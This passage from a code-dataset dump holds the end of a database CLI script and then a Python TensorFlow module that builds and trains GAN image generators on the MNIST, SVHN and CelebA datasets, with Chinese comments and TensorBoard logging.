args['--dry-run'])\n\n LOG.info(f'{Fore.GREEN}completed{Fore.RESET} in {Fore.CYAN}{utils.format_time(perf_counter() - start_seconds)}{Fore.RESET}')\n\n sys.exit()\n\n if args['trim']:\n trim(args['--dry-run'])\n\n LOG.info(f'{Fore.GREEN}completed{Fore.RESET} in {Fore.CYAN}{utils.format_time(perf_counter() - start_seconds)}{Fore.RESET}')\n\n sys.exit()\n\n if args['update']:\n tables = args['--table']\n\n if args['--from-change-detection']:\n tables = get_tables_from_change_detection()\n\n update(tables, args['--dry-run'])\n\n LOG.info(f'{Fore.GREEN}completed{Fore.RESET} in {Fore.CYAN}{utils.format_time(perf_counter() - start_seconds)}{Fore.RESET}')\n\n sys.exit()\n\n LOG.info(f'{Fore.GREEN}completed{Fore.RESET} in {Fore.CYAN}{utils.format_time(perf_counter() - start_seconds)}{Fore.RESET}')\n\n sys.exit()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/cloudb/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"142108478","text":"import importlib as imp\nimport os\nimport pickle as pkl\nimport pylab as plt\n\nimport numpy as np\nimport tensorflow as tf\n\nimport glob\nimport PIL as pil\n\nimport tqdm\n\n# 引用外部包。包含有一份 __init__.py文件的目录\n# 工具包 和 项目的全局设置\nimport DsPython.DsTools as tools\n\n# 首先必须先引用父包,将当前的模块的路径信息加进去。\nfrom .. import this_module as parent_module\n\n# 将当前模块的设置信息加入到全局变量\nthis_module = tools.global_setting.add_module_setting(\n file=__file__, parent=parent_module\n)\n\n# 导入当前目录下的子模块,该子模块包含一个 __init__.py 文件\n# from . import p1 as p1\n# from . 
import p2 as p2\n\ndef reload():\n print('reload in {}'.format(__file__))\n\n # 重新加载外部包。\n imp.reload(tools)\n tools.reload()\n\n # 重新加载兄弟包。\n # imp.reload(p2)\n # p2.reload()\n\n # 重载每一个一级模块,并且让每个一级模块重载自己的子模块。\n\n# # 在此派生继承自外部的类\n# class p1_from_p2(p2.c1.p2_class_1):\n# def __init__(self):\n# super(p1_from_p2, self).__init__('this dir')\n# print('p1_from_p2 init :{}'.format(__file__))\n\n\ndef view_samples_2():\n global path_saver\n with open(path_saver, 'rb') as f:\n samples = pkl.load(f)\n\n rows, cols = 10, 6\n fig, axes = plt.subplots(figsize=(7, 12), nrows=rows, ncols=cols, sharex=True, sharey=True)\n\n for sample, ax_row in zip(samples[::int(len(samples) / rows)], axes):\n for img, ax in zip(sample[::int(len(sample) / cols)], ax_row):\n ax.imshow(img.reshape((28, 28)), cmap='Greys_r')\n ax.xaxis.set_visible(False)\n ax.yaxis.set_visible(False)\n\n\ndef view_samples(epoch=-1, samples=None):\n global path_saver\n\n if samples is None:\n with open(path_saver, 'rb') as f:\n samples = pkl.load(f)\n\n fig, axes = plt.subplots(figsize=(7, 7), nrows=4, ncols=4, sharey=True, sharex=True)\n for ax, img in zip(axes.flatten(), samples[epoch]):\n ax.xaxis.set_visible(False)\n ax.yaxis.set_visible(False)\n im = ax.imshow(img.reshape((28, 28)), cmap='Greys_r')\n\n return fig, axes\n\n\nMNIST_DIR = os.path.join(parent_module['datas path'], 'MNIST_data')\nSVHM_DIR = os.path.join(parent_module['datas path'], 'SVHM')\n\ndatas_path = this_module['datas path']\n\ncheckpoints_name = 'generator.ckpt'\ncheckpoints_dir = os.path.join(datas_path, 'checkpoints')\ntools.global_setting.dir_init(checkpoints_dir)\ncheckpoints_path = os.path.join(checkpoints_dir, checkpoints_name)\n# sample_path = os.path.join(datas_path, 'train_samples.pkl')\n\n# Tired of seeing the same results every time? 
Remove the line below.\n# np.random.seed(42)\n# Size of input image to discriminator\ninput_size = 784 # 28x28 MNIST images flattened 一张输入图片被一维化了。\n\n# Size of latent vector to generator\n# 随机生成的噪点,\nZ_NOISE_SIZE = 100\n\n# Sizes of hidden layers in generator and discriminator\nG_HIDDEN_SIZE = 128\nD_HIDDEN_SIZE = 128\n# Leak factor for leaky ReLU\nLEAKY_RELU_ALPHA = 0.01\n# Label smoothing\n# 标签平滑化的参数。\nsmooth = 0.1\n\nDROPOUT = .3\n# Optimizers\nLEARNING_RATE = 0.002\n\nBATCH_SIZE = 128\n\n\ndef do_this():\n\n celeba_dir = os.path.join(parent_module['datas path'], 'gan_datas', 'img_align_celeba')\n svhm_dir = os.path.join(parent_module['datas path'], 'gan_datas', 'SVHM')\n mnist_images_dir = os.path.join(parent_module['datas path'], 'gan_datas', 'mnist')\n mnist_npz_file = os.path.join(parent_module['datas path'], 'gan_datas', 'mnist.npz')\n\n\n dts_svhm = tools.tf.DsDataset()\n dts_svhm.sample_svhm(dir=svhm_dir, use_scaler=True, feature_range=(-1,1))\n\n # dts = tools.tf.DsDataset()\n # dts.sample_from_images_dir(dir=mnist_images_dir, use_scaler=True,)\n # model = DsTfGan(dataset=dts)\n\n # # 生成器生成的值范围在(-1,1),所以缩放器要设置在相同区域。\n dts_mnist = tools.tf.DsDataset()\n dts_mnist.sample_mnist(npz_dir=mnist_npz_file, use_scaler=True)\n\n dts_celeba = tools.tf.DsDataset()\n dts_celeba.sample_celeba(dir=celeba_dir, use_big_size=False, use_scaler=True)\n\n dts = dts_celeba\n\n model = DsTfGan(dataset=dts)\n\n return model\n\n\ndef tf_svhm(epochs=2, train_size=None):\n\n # 设定log目录\n log_dir = os.path.join(datas_path, 'gan_svhm', 'log')\n\n # 加载数据\n\n from scipy.io import loadmat\n trainset = loadmat(os.path.join(SVHM_DIR, 'train_32x32.mat'))\n testset = loadmat(os.path.join(SVHM_DIR, 'test_32x32.mat'))\n\n # 初始化图\n tf.reset_default_graph()\n\n # 全局随机数种子\n # tf.set_random_seed(RANDOM_SEED)\n\n # input 占位符\n def model_inputs(real_dim, z_dim):\n inputs_real = tf.placeholder(tf.float32, (None, *real_dim), name='input_real')\n inputs_z = tf.placeholder(tf.float32, (None, z_dim), name='input_z')\n\n return inputs_real, inputs_z\n\n def generator(z, output_dim, reuse=False, alpha=0.2, training=True):\n with tf.variable_scope('generator', reuse=reuse):\n # First fully connected layer\n x1 = tf.layers.dense(z, 4 * 4 * 512)\n # Reshape it to start the convolutional stack\n x1 = tf.reshape(x1, (-1, 4, 4, 512))\n x1 = tf.layers.batch_normalization(x1, training=training)\n x1 = tf.maximum(alpha * x1, x1)\n # 4x4x512 now\n\n x2 = tf.layers.conv2d_transpose(inputs=x1, filters=256, kernel_size=5, strides=2, padding='same')\n x2 = tf.layers.batch_normalization(inputs=x2, training=training)\n x2 = tf.maximum(alpha * x2, x2)\n # 8x8x256 now\n\n x3 = tf.layers.conv2d_transpose(inputs=x2, filters=128, kernel_size=5, strides=2, padding='same')\n x3 = tf.layers.batch_normalization(inputs=x3, training=training)\n x3 = tf.maximum(alpha * x3, x3)\n # 16x16x128 now\n\n # Output layer\n logits = tf.layers.conv2d_transpose(inputs=x3, filters=output_dim, kernel_size=5, strides=2, padding='same')\n # 32x32x3 now\n\n out = tf.tanh(logits)\n\n return out\n\n def discriminator(x, reuse=False, alpha=0.2):\n with tf.variable_scope('discriminator', reuse=reuse):\n # Input layer is 32x32x3\n x1 = tf.layers.conv2d(x, 64, 5, strides=2, padding='same')\n relu1 = tf.maximum(alpha * x1, x1)\n # 16x16x64\n\n x2 = tf.layers.conv2d(relu1, 128, 5, strides=2, padding='same')\n bn2 = tf.layers.batch_normalization(x2, training=True)\n relu2 = tf.maximum(alpha * bn2, bn2)\n # 8x8x128\n\n x3 = tf.layers.conv2d(relu2, 256, 5, strides=2, 
padding='same')\n bn3 = tf.layers.batch_normalization(x3, training=True)\n relu3 = tf.maximum(alpha * bn3, bn3)\n # 4x4x256\n\n # Flatten it\n flat = tf.reshape(relu3, (-1, 4 * 4 * 256))\n logits = tf.layers.dense(flat, 1)\n out = tf.sigmoid(logits)\n\n return out, logits\n\n def model_loss(input_real, input_z, output_dim, alpha=0.2):\n \"\"\"\n Get the loss for the discriminator and generator\n :param input_real: Images from the real dataset\n :param input_z: Z input\n :param out_channel_dim: The number of channels in the output image\n :return: A tuple of (discriminator loss, generator loss)\n \"\"\"\n g_model = generator(input_z, output_dim, alpha=alpha)\n d_model_real, d_logits_real = discriminator(input_real, alpha=alpha)\n d_model_fake, d_logits_fake = discriminator(g_model, reuse=True, alpha=alpha)\n\n d_loss_real = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_real, labels=tf.ones_like(d_model_real)))\n d_loss_fake = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_fake, labels=tf.zeros_like(d_model_fake)))\n g_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_fake, labels=tf.ones_like(d_model_fake)))\n\n d_loss = d_loss_real + d_loss_fake\n\n # tf.summary.scalar(name='dloss', d_loss)\n # tf.summary.scalar(name='gloss', g_loss)\n\n tf.summary.scalar('g_loss', g_loss)\n tf.summary.scalar('d_loss', d_loss)\n tf.summary.image(\n name='g_model',\n max_outputs=1,\n tensor=g_model\n )\n\n return d_loss, g_loss\n\n def model_opt(d_loss, g_loss, learning_rate, beta1):\n \"\"\"\n Get optimization operations\n :param d_loss: Discriminator loss Tensor\n :param g_loss: Generator loss Tensor\n :param learning_rate: Learning Rate Placeholder\n :param beta1: The exponential decay rate for the 1st moment in the optimizer\n :return: A tuple of (discriminator training operation, generator training operation)\n \"\"\"\n # Get weights and bias to update\n t_vars = tf.trainable_variables()\n d_vars = [var for var in t_vars if var.name.startswith('discriminator')]\n g_vars = [var for var in t_vars if var.name.startswith('generator')]\n\n # Optimize\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n d_train_opt = tf.train.AdamOptimizer(learning_rate, beta1=beta1).minimize(d_loss, var_list=d_vars)\n g_train_opt = tf.train.AdamOptimizer(learning_rate, beta1=beta1).minimize(g_loss, var_list=g_vars)\n\n\n return d_train_opt, g_train_opt\n\n class GAN:\n def __init__(self, real_size, z_size, learning_rate, alpha=0.2, beta1=0.5):\n tf.reset_default_graph()\n\n self.input_real, self.input_z = model_inputs(real_size, z_size)\n\n self.d_loss, self.g_loss = model_loss(\n self.input_real, self.input_z, real_size[2], alpha=alpha\n )\n\n self.d_opt, self.g_opt = model_opt(\n self.d_loss, self.g_loss, learning_rate, beta1\n )\n\n def view_samples(epoch, samples, nrows, ncols, figsize=(5, 5)):\n fig, axes = plt.subplots(\n figsize=figsize, nrows=nrows, ncols=ncols,sharey=True, sharex=True\n )\n for ax, img in zip(axes.flatten(), samples[epoch]):\n ax.axis('off')\n img = ((img - img.min()) * 255 / (img.max() - img.min())).astype(np.uint8)\n ax.set_adjustable('box-forced')\n im = ax.imshow(img, aspect='equal')\n\n plt.subplots_adjust(wspace=0, hspace=0)\n return fig, axes\n\n def train(net, dataset, epochs=1, print_every=10, show_every=100, figsize=(5, 5)):\n\n # samples, losses = [], []\n steps = 0\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n merged = tf.summary.merge_all() # 
将图形、训练过程等数据合并在一起\n log = tools.tf.DsTfLog(log_dir=log_dir, graph=sess.graph)\n\n for e in range(epochs):\n print('训练数据遍历 {}/{} 代'.format(e+1, epochs))\n\n batch = dataset.batches()\n dataset.summary()\n # 运行摘要所需要的数据。\n log_feed_dict = None\n #\n for _ in tqdm.tqdm(range(dataset.batch_count)):\n\n x, y = next(batch)\n steps += 1\n # print('step:{}, x.shape:{} '.format(steps, x.shape))\n # Sample random noise for G\n batch_z = np.random.uniform(-1, 1, size=(batch_size, z_size))\n\n # Run optimizers\n log_feed_dict = {net.input_real: x, net.input_z: batch_z}\n sess.run(net.d_opt, feed_dict=log_feed_dict)\n\n sess.run(net.g_opt, feed_dict={net.input_z: batch_z, net.input_real: x})\n\n # 训练完一代数据后,运行摘要\n m = sess.run(merged, feed_dict=log_feed_dict)\n log.writer.add_summary(summary=m, global_step=e)\n\n # if steps % print_every == 0:\n # # At the end of each epoch, get the losses and print them out\n # train_loss_d = net.d_loss.eval({net.input_z: batch_z, net.input_real: x})\n # train_loss_g = net.g_loss.eval({net.input_z: batch_z})\n #\n # print(\"Epoch {}/{}...\".format(e + 1, epochs),\n # \"Discriminator Loss: {:.4f}...\".format(train_loss_d),\n # \"Generator Loss: {:.4f}\".format(train_loss_g))\n # # Save losses to view after training\n # losses.append((train_loss_d, train_loss_g))\n #\n # if steps % show_every == 0:\n # sample_z = np.random.uniform(-1, 1, size=(72, z_size))\n # gen_samples = sess.run(\n # generator(net.input_z, 3, reuse=True, training=False),\n # feed_dict={net.input_z: sample_z})\n # samples.append(gen_samples)\n # _ = view_samples(-1, samples, 6, 12, figsize=figsize)\n # plt.show()\n\n saver = tf.train.Saver()\n saver.save(sess, log_dir)\n\n\n real_size = (32, 32, 3)\n z_size = 100\n learning_rate = 0.0002\n batch_size = 128\n alpha = 0.2\n beta1 = 0.5\n\n dataset = tools.tf.DsDataset(train=trainset, test=testset, train_size=train_size)\n\n net = GAN(dataset.input_shape, z_size, learning_rate, alpha=alpha, beta1=beta1)\n\n train(net, dataset, epochs=epochs, figsize=(10, 5))\n\n\nclass DsTfFrame(object):\n def __init__(self, dataset, learning_rate=0.0005, leak_alpha=.2, beta1=.5):\n self.class_name = str(type(self)).replace('>', '').replace(\"'\", '').split('.')[-1:][0]\n self.dataset = dataset\n\n self.hp_learning_rate =learning_rate\n self.hp_leak_relu_alpha = leak_alpha\n self.hp_beta1 = beta1\n\n # 设定log目录\n self.datas_root = os.path.join(datas_path, self.class_name)\n self.log_dir = os.path.join(self.datas_root, 'log')\n self.ckpt_file = os.path.join(self.log_dir, 'model.ckpt')\n print('datas path :', self.datas_root)\n print('log path :', self.log_dir)\n print('checkpoint file path :', self.ckpt_file)\n\n tf.reset_default_graph()\n\n self.fs = tools.tf.FlowStep(run_count_max=1)\n\n def model(self):\n self.model_inputs()\n\n # 输入\n self.ph_input_real, self.ph_input_noise, self.ph_learning_rate = self.model_inputs()\n\n # 损失\n g_imgs, d_loss, g_loss = self.model_loss(self.ph_input_real, self.ph_input_noise, self.dataset.input_shape[2])\n self.loss = [g_imgs, d_loss, g_loss]\n\n # 优化\n d_opt, g_opt = self.model_opt(\n d_loss=d_loss, g_loss=g_loss,\n learning_rate=self.ph_learning_rate, beta1=self.hp_beta1\n )\n self.train_opt = [d_opt, g_opt]\n\n def model_inputs(self, ):\n # real_dim = (32, 32, 3)\n # (None, *real_dim) = (None, 32, 32, 3) 引用值\n # (None, real_dim) = (None, (32, 32, 3)) 引用对象\n # inputs_real = tf.placeholder(tf.float32, (None, *real_dim), name='input_real')\n self.input = tf.placeholder(dtype=tf.float32, shape=(None, *self.dataset.input_shape), 
name='input')\n self.label = tf.placeholder(dtype=tf.float32, shape=(None, 10))\n self.fs.add_one_step('input', self.input)\n\n return self.input\n\n def get_batchs_generator(self, train_batchs):\n batch = self.dataset.get_generator(train_batchs=train_batchs)\n self.dataset.summary()\n\n return batch\n\n def get_feed_dict(self, batch):\n # 获取一批数据\n # 得到该批数据的长度\n x, y = next(batch)\n x = self.dataset.scaler_transform(data=x)\n this_batch_length = len(x)\n\n # 填充摘要数据\n feed_dict = {\n self.input: x,\n }\n\n return feed_dict, this_batch_length\n\n def summary_to_tensorboard(self, sess, feed_dict, steps, log):\n print('summary_to_tensorboard')\n # g_images, dloss, gloss = sess.run(self.loss, feed_dict=feed_dict)\n # # print('type:{}, shape:{} min:{},max:{}'.format(type(g_images), g_images.shape, np.min(g_images), np.max(g_images)))\n #\n # # 训练完一代数据后,运行摘要\n # log.log_scalar('dloss', value=dloss, step=steps)\n # log.log_scalar('gloss', value=gloss, step=steps)\n #\n # self.d_loss.append(dloss)\n # self.g_loss.append(gloss)\n #\n # log.log_histogram(tag='hist_dloss', values=self.d_loss, step=steps)\n # log.log_histogram(tag='hist_gloss', values=self.g_loss, step=steps)\n #\n # image = self.dataset.scaler_inverse(g_images[:9]).reshape(-1, *g_images.shape[1:])\n # # print('type:{}, shape:{} min:{}, max:{}'.format(type(image), image.shape, np.min(image), np.max(image)))\n # log.log_images_square('img', images=image, step=steps)\n\n def leaky_relu(self, x, alpha=0.2, name='leaky_relu'):\n return tf.maximum(x, alpha * x, name=name)\n\n def train(self, epochs=1, train_batchs=3, summary_steps=1):\n\n self.summary_steps = summary_steps\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n # 准备 tensorboard 日志摘要\n log = tools.tf.DsTfLog(log_dir=self.log_dir, graph=sess.graph)\n\n steps = 0\n for e in range(epochs):\n print('——————第 {}/{} 代数据训练开始——————'.format(e+1, epochs))\n\n # 设置数据生成器,\n batch = self.get_batchs_generator(train_batchs=train_batchs)\n\n # 开始一代数据的训练\n for _ in tqdm.tqdm(range(self.dataset.batch_count)):\n\n steps += 1\n\n feed_dict, batch_length = self.get_feed_dict(batch=batch)\n\n # 运行训练,优化\n _, _ = sess.run(self.opt, feed_dict=feed_dict)\n\n # 运行结构跟踪\n self.fs.run_flow(feed=feed_dict)\n\n self._on_batch_end(sess=sess, feed_dict=feed_dict, e=e, steps=steps, log=log)\n\n self._on_epoch_end(sess=sess, feed_dict=feed_dict, e=e, steps=steps, log=log)\n\n\n # 训练结束,储存模型\n saver = tf.train.Saver()\n saver.save(sess=sess, save_path=self.ckpt_file)\n\n\nclass DsTfGan(object):\n\n def __init__(self, dataset, noise_size=100, learning_rate=0.0005, leak_alpha=.2, beta1=.5, smooth_alpha=.9):\n # 超参数\n self.hp_noise_size = noise_size\n self.hp_learning_rate =learning_rate\n self.hp_leak_relu_alpha = leak_alpha\n self.hp_beta1 = beta1\n self.hp_smooth_alpha = smooth_alpha\n self.hp_dropout = .2\n\n self.dataset = dataset\n\n self.class_name = str(type(self)).replace('>', '').replace(\"'\", '').split('.')[-1:][0]\n\n # 设定log目录\n self.datas_root = os.path.join(datas_path, self.class_name)\n self.log_dir = os.path.join(self.datas_root, 'log')\n self.ckpt_file = os.path.join(self.log_dir, 'model.ckpt')\n print('datas path :', self.datas_root)\n print('log path :', self.log_dir)\n print('checkpoint file path :', self.ckpt_file)\n\n tf.reset_default_graph()\n self.fs = tools.tf.FlowStep(run_count_max=1)\n\n self.model()\n\n def model_inputs(self,):\n # real_dim = (32, 32, 3)\n # (None, *real_dim) = (None, 32, 32, 3) 引用值\n # (None, real_dim) = (None, (32, 32, 3)) 引用对象\n # inputs_real 
= tf.placeholder(tf.float32, (None, *real_dim), name='input_real')\n input_real = tf.placeholder(tf.float32, (None, *self.dataset.input_shape), name='input_real')\n input_noise = tf.placeholder(tf.float32, (None, self.hp_noise_size), name='inputs_noises')\n learning_rate = tf.placeholder(tf.float32, name='learning_rate')\n\n self.fs.add_one_step('input_gan_real', input_real)\n self.fs.add_one_step('input_gan_noise', input_noise)\n\n return input_real, input_noise, learning_rate\n\n def get_batchs_generator(self, train_batchs):\n batch = self.dataset.get_generator(train_batchs=train_batchs)\n self.dataset.summary()\n\n return batch\n\n def get_feed_dict(self, batch):\n # 获取一批数据\n # 得到该批数据的长度\n x, y = next(batch)\n x = self.dataset.scaler_transform(data=x)\n this_batch_length = len(x)\n # print('x type:{}, shape:{}, min:{}, max:{}'.format(type(x), x.shape, np.min(x), np.max(x)))\n\n # 生成与批量数据长度一致的批量噪点\n batch_noise = np.random.uniform(-1, 1, size=(this_batch_length, self.hp_noise_size))\n\n # 填充摘要数据\n feed_dict = {\n self.ph_input_real: x,\n self.ph_input_noise: batch_noise,\n self.ph_learning_rate: self.hp_learning_rate\n }\n\n return feed_dict, this_batch_length\n\n def generator(self, z, out_channel_dim, is_train=True, alpha=0.01):\n \"\"\"\n Create the generator network\n :param z: Input z\n :param out_channel_dim: The number of channels in the output image\n :param is_train: Boolean if generator is being used for training\n :return: The tensor output of the generator\n \"\"\"\n\n # leaky_relu = lambda x: tf.maximum(alpha * x, x)\n with tf.variable_scope(\"generator\", reuse=not is_train):\n # x1 = tf.layers.dense(z, 7 * 7 * 512)\n # x1 = tf.reshape(x1, (-1, 7, 7, 512))\n\n x1 = tf.layers.dense(inputs=z, units=self.conv_last_height * self.conv_last_width * self.conv_last_chanel)\n x1 = tf.reshape(x1, (-1, self.conv_last_height, self.conv_last_width, self.conv_last_chanel))\n\n x1 = tf.layers.batch_normalization(x1, training=is_train)\n x1 = self.leaky_relu(x=x1, alpha=alpha)\n x1 = tf.layers.dropout(inputs=x1, rate=self.hp_dropout)\n last_conv = x1\n self.fs.add_one_step('generator_x1', x1)\n # 7*7*512\n\n x2 = tf.layers.conv2d_transpose(\n inputs=x1, filters=256, kernel_size=5, strides=1, padding='SAME',\n kernel_initializer=tf.contrib.layers.xavier_initializer()\n )\n x2 = tf.layers.batch_normalization(x2, training=is_train)\n x2 = self.leaky_relu(x=x2, alpha=alpha)\n x2 = tf.layers.dropout(inputs=x2, rate=self.hp_dropout)\n last_conv = x2\n self.fs.add_one_step('generator_x2', x2)\n\n # 7*7*256\n\n x3 = tf.layers.conv2d_transpose(\n inputs=x2, filters=128, kernel_size=5, strides=2, padding='SAME',\n kernel_initializer=tf.contrib.layers.xavier_initializer()\n )\n x3 = tf.layers.batch_normalization(x3, training=is_train)\n x3 = self.leaky_relu(x=x3, alpha=alpha)\n x3 = tf.layers.dropout(inputs=x3, rate=self.hp_dropout)\n last_conv = x3\n self.fs.add_one_step('generator_x3', x3)\n\n # 14*14*128\n\n x4 = tf.layers.conv2d_transpose(\n inputs=x3, filters=64, kernel_size=5, strides=2, padding='SAME',\n kernel_initializer=tf.contrib.layers.xavier_initializer()\n )\n x4 = tf.layers.batch_normalization(x4, training=is_train)\n x4 = self.leaky_relu(x=x4, alpha=alpha)\n x4 = tf.layers.dropout(inputs=x4, rate=self.hp_dropout)\n last_conv = x4\n self.fs.add_one_step('generator_x4', x4)\n\n\n # logits = tf.layers.conv2d_transpose(x4, out_channel_dim, 5, 2, 'SAME')\n logits = tf.layers.conv2d_transpose(\n inputs=last_conv, filters=out_channel_dim, kernel_size=5, strides=2, padding='SAME',\n 
kernel_initializer=tf.contrib.layers.xavier_initializer()\n )\n self.fs.add_one_step('generator_logits', logits)\n\n out = tf.tanh(logits)\n self.fs.add_one_step('generator_out', out)\n\n # 28*28*out_channel_dim\n return out\n\n def discriminator(self, images, reuse=False, alpha=0.01):\n \"\"\"\n Create the discriminator network\n :param image: Tensor of input image(s)\n :param reuse: Boolean if the weights should be reused\n :return: Tuple of (tensor output of the discriminator, tensor logits of the discriminator)\n \"\"\"\n #leaky_relu = lambda x: tf.maximum(alpha * x, x)\n\n def conv(inputs, filters, batch_norm=True):\n outputs = tf.layers.conv2d(\n inputs=inputs, filters=filters, kernel_size=5, strides=2, padding='same',\n kernel_initializer=tf.contrib.layers.xavier_initializer()\n )\n\n if batch_norm:\n outputs = tf.layers.batch_normalization(outputs, training=True)\n\n outputs = self.leaky_relu(x=outputs, alpha=alpha)\n outputs = tf.layers.dropout(inputs=outputs, rate=self.hp_dropout)\n return outputs\n\n with tf.variable_scope(\"discriminator\", reuse=reuse):\n # input 28*28*3\n print('images type:{}, shape:{}, min:{}, max:{}'.format(type(images), images.shape, np.min(images), np.max(images)))\n x1 = conv(inputs=images, filters=64, batch_norm=False) # 14*14*64\n self.fs.add_one_step('discriminator_conv1', x1)\n\n x2 = conv(inputs=x1, filters=128) # 7*7*128\n self.fs.add_one_step('discriminator_conv2', x2)\n\n x3 = conv(inputs=x2, filters=256) # 4*4*256\n self.fs.add_one_step('discriminator_conv3', x3)\n\n # 输出最后的形状给生成器,生成器才知道生成图片的大小。\n last_conv = x3\n self.conv_last_height = last_conv.shape[1].value\n self.conv_last_width = last_conv.shape[2].value\n self.conv_last_chanel = last_conv.shape[3].value\n\n flat = tf.reshape(\n tensor=x3, shape=(-1, self.conv_last_height * self.conv_last_width * self.conv_last_chanel)\n )\n # flat = tf.reshape(tensor=x3, shape=(-1, 4, 4, 256))\n self.fs.add_one_step('discriminator_reshape', flat)\n\n # flat = x3\n\n logits = tf.layers.dense(inputs=flat, units=1)\n self.fs.add_one_step('discriminator_logits', logits)\n\n out = tf.sigmoid(x=logits)\n self.fs.add_one_step('discriminator_out', out)\n\n return out, logits, last_conv\n\n def model_loss(self, input_real, input_z, out_channel_dim, alpha=0.9):\n \"\"\"\n Get the loss for the discriminator and generator\n :param input_real: Images from the real dataset\n :param input_z: Z input\n :param out_channel_dim: The number of channels in the output image\n :return: A tuple of (discriminator loss, generator loss)\n \"\"\"\n\n # 训练鉴别器看真图, 得到真图的结构(宽,高,通道),结构就在last_conv里\n _, d_logits_real, last_conv = self.discriminator(input_real)\n\n # 用真图的结构,生成假图\n g_model = self.generator(input_z, out_channel_dim)\n\n # 用真图的权重来比较假图\n _, d_logits_fake, _ = self.discriminator(g_model, reuse=True)\n\n # 记住真图的loss,\n d_loss_real = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_real, labels=tf.ones_like(d_logits_real) * alpha))\n\n # 记住假图的loss\n d_loss_fake = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_fake, labels=tf.zeros_like(d_logits_fake)))\n\n # 真图loss和假图loss合起来才是鉴别器的真正loss\n # 前后两次喂给鉴别器的图可能尺寸不一致,所以要分开来计算loss\n d_loss = d_loss_real + d_loss_fake\n\n # 生成器\n g_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_fake, labels=tf.ones_like(d_logits_fake)))\n\n return g_model, d_loss, g_loss\n\n def model_opt(self, d_loss, g_loss, learning_rate, beta1):\n \"\"\"\n Get optimization operations\n :param d_loss: Discriminator loss Tensor\n 
:param g_loss: Generator loss Tensor\n :param learning_rate: Learning Rate Placeholder\n :param beta1: The exponential decay rate for the 1st moment in the optimizer\n :return: A tuple of (discriminator training operation, generator training operation)\n \"\"\"\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n\n with tf.control_dependencies(update_ops):\n t_vars = tf.trainable_variables()\n\n d_vars = [var for var in t_vars if var.name.startswith('discriminator')]\n g_vars = [var for var in t_vars if var.name.startswith('generator')]\n\n d_train_opt = tf.train.AdamOptimizer(learning_rate, beta1=beta1).minimize(d_loss, var_list=d_vars)\n g_train_opt = tf.train.AdamOptimizer(learning_rate, beta1=beta1).minimize(g_loss, var_list=g_vars)\n\n return d_train_opt, g_train_opt\n\n def model(self):\n\n # 输入\n self.ph_input_real, self.ph_input_noise, self.ph_learning_rate = self.model_inputs()\n\n # 损失\n g_imgs, d_loss, g_loss = self.model_loss(self.ph_input_real, self.ph_input_noise, self.dataset.input_shape[2])\n self.loss = [g_imgs, d_loss, g_loss]\n\n # 优化\n d_opt, g_opt = self.model_opt(\n d_loss=d_loss, g_loss=g_loss,\n learning_rate=self.ph_learning_rate, beta1=self.hp_beta1\n )\n self.train_opt = [d_opt, g_opt]\n\n def _on_batch_end(self, sess, feed_dict, e, steps, log):\n if steps % self.summary_steps == 0:\n self.summary_to_tensorboard(sess=sess, feed_dict=feed_dict, steps=steps, log=log)\n\n def _on_epoch_end(self, sess, feed_dict, e, steps, log):\n print('***第 {} 代数据训练结束***'.format(e + 1))\n self.summary_to_tensorboard(sess=sess, feed_dict=feed_dict, steps=steps, log=log)\n\n def train(self, epochs=1, train_batchs=3, summary_steps=1):\n\n self.summary_steps = summary_steps\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n # 准备 tensorboard 日志摘要\n log = tools.tf.DsTfLog(log_dir=self.log_dir, graph=sess.graph)\n self.d_loss = []\n self.g_loss = []\n\n steps = 0\n for e in range(epochs):\n print('——————第 {}/{} 代数据训练开始——————'.format(e+1, epochs))\n\n # 设置数据生成器,\n batch = self.get_batchs_generator(train_batchs=train_batchs)\n\n # 开始一代数据的训练\n for _ in tqdm.tqdm(range(self.dataset.batch_count)):\n\n steps += 1\n\n # 获取数据\n feed_dict, batch_length = self.get_feed_dict(batch=batch)\n\n # 运行训练,优化\n sess.run(self.train_opt, feed_dict=feed_dict)\n\n # 运行结构跟踪\n # self.fs.run_flow(feed=feed_dict)\n\n self._on_batch_end(sess=sess, feed_dict=feed_dict, e=e, steps=steps, log=log)\n\n self._on_epoch_end(sess=sess, feed_dict=feed_dict, e=e, steps=steps, log=log)\n\n\n # 训练结束,储存模型\n saver = tf.train.Saver()\n saver.save(sess=sess, save_path=self.ckpt_file)\n\n def summary_to_tensorboard(self, sess, feed_dict, steps, log):\n print('_on_summary')\n g_images, dloss, gloss = sess.run(self.loss, feed_dict=feed_dict)\n # print('type:{}, shape:{} min:{},max:{}'.format(type(g_images), g_images.shape, np.min(g_images), np.max(g_images)))\n\n # 训练完一代数据后,运行摘要\n log.log_scalar('dloss', value=dloss, step=steps)\n log.log_scalar('gloss', value=gloss, step=steps)\n\n self.d_loss.append(dloss)\n self.g_loss.append(gloss)\n\n log.log_histogram(tag='hist_dloss', values=self.d_loss, step=steps)\n log.log_histogram(tag='hist_gloss', values=self.g_loss, step=steps)\n\n image = self.dataset.scaler_inverse(g_images[:9]).reshape(-1, *g_images.shape[1:])\n # print('type:{}, shape:{} min:{}, max:{}'.format(type(image), image.shape, np.min(image), np.max(image)))\n log.log_images_square('img', images=image, step=steps)\n\n def leaky_relu(self, x, alpha=0.2, name='leaky_relu'):\n return 
